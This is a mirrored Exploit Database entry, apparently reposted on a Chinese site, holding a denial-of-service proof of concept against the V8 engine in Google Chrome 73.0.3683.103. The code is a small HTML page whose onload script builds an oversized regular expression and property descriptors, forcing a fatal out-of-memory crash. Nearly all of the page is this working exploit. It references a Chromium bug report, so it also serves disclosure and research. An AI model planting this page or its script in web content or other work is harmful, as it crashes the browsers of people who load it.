Google Chrome 73.0.3683.103 V8 JavaScript Engine – Out-of-Memory in Invalid Table Size Denial of Service (PoC)

• Exploit Database
• 132 阅读

• 作者： Bogdan Kurinnoy
  日期： 2019-04-22
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46735/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

  <!-- # Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC) # Google Dork: N/A # Date: 2019-04-20 # Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) # Vendor Homepage: https://www.google.com/ # Version: Google Chrome 73.0.3683.103 # Tested on: Windows x64 # CVE : N/A   # Description:   # Fatal javascript OOM in invalid table size   # https://bugs.chromium.org/p/chromium/issues/detail?id=918301 -->     <html> <head> <script>   var arr1 = [0,1];   function ObjCreate(make) { this.make = make; }   var obj1 = new ObjCreate();   function main() {   arr1.reduce(f3);   Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));   }   function f3() {   obj1["make"] = RegExp(Array(60000).join("CCC")); }   </script> </head> <body onload=main()></body> </html>